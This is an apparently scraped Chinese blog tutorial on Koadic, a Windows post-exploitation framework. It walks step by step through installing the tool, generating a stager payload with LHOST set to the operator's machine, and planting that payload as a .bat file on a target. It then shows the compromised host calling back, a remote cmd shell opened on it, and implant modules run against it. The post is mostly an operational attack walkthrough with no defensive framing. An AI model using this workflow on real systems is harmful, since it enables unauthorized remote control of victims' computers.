windows提权辅助工具koadic

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了windows提权辅助工具koadic相关的知识,希望对你有一定的参考价值。

项目地址:https://github.com/zerosum0x0/koadic

┌─[[email protected]]─[/sch01ar]
└──? #git clone https://github.com/zerosum0x0/koadic

 下载后打开并安装所需的包

┌─[[email protected]]─[/sch01ar/koadic]
└──? #pip install -r requirements.txt

 安装完成后启动程序

┌─[[email protected]]─[/sch01ar/koadic]
└──? #./koadic 

 技术分享图片

输入use和空格然后连按两下Tab键查看模块

技术分享图片

stager开头的模块是用来反弹主机的,implant开头的模块是用来对反弹的主机进行操作

选择stager/js/disk进行测试

(koadic: sta/js/mshta)# use stager/js/disk

 技术分享图片

查看配置信息

(koadic: sta/js/disk)# info

 技术分享图片

设置lhost

(koadic: sta/js/disk)# set LHOST 192.168.220.132

 技术分享图片

然后run

(koadic: sta/js/disk)# run

 技术分享图片

然后把[>]后的东西写到一个bat文件里,放到目标主机打开

注:stager开头的模块都是一样的操作

得到目标主机的反弹

技术分享图片

查看僵尸主机列表

(koadic: sta/js/disk)# zombies

 技术分享图片

注:此目标主机的ID为0

执行cmd命令,0为主机的ID

(koadic: sta/js/disk)# cmdshell 0
[koadic: ZOMBIE 0 (192.168.220.129) - cmd.exe]> whoami

 技术分享图片

该上implant模块了

(koadic: sta/js/disk)# use implant/fun/voice

 技术分享图片

这个MESSAGE随便你设置,然后run

技术分享图片

将会在目标主机朗读MESSAGE的内容

以上是关于windows提权辅助工具koadic的主要内容,如果未能解决你的问题,请参考以下文章

实战ms16-075提权Windows Server 2012

windows靶场提权总结

Windows提权辅助工具

Windows操作系统——WindowsVulnScan提权辅助工具简介与使用教程

利用iis漏洞进行提权的功能是?

mysql提权利用工具